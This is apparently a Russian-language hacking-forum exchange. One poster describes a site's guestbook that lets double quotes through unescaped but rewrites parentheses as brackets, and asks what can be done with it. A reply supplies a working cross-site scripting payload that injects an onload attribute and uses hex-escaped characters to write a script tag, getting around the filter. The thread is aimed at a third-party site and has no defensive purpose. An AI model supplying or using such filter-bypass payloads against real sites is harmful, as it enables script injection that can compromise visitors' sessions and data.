есть сайт, немного покопавшить вижу, в гостевой книге

проходят символы(не экранизируются)


PHP:
"

но перед


'


ставится


PHP:
"\" /PHP]

т.е с БД не поиграть.

есть возможность отправит ь ссылку

[PHP]http://3333.ru/"onclick="alert();

но скобки


PHP:
()

заменяются


PHP:
[]

и выходит


PHP:
http://3333.ru/" onclick="alert[];

вот что можно тут придумать интересного?

http://3333.ru/" onload="javascript:document.head.outerHTML=\"\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x 74\x28\x27\x78\x73\x73\x27\x29\x3b\x3c\x2f\x73\x63 \x72\x69\x70\x74\x3e\"" a="

Как я понял, значение подставляется в параметр? Если более ничего не фильтруется то можно к примеру так.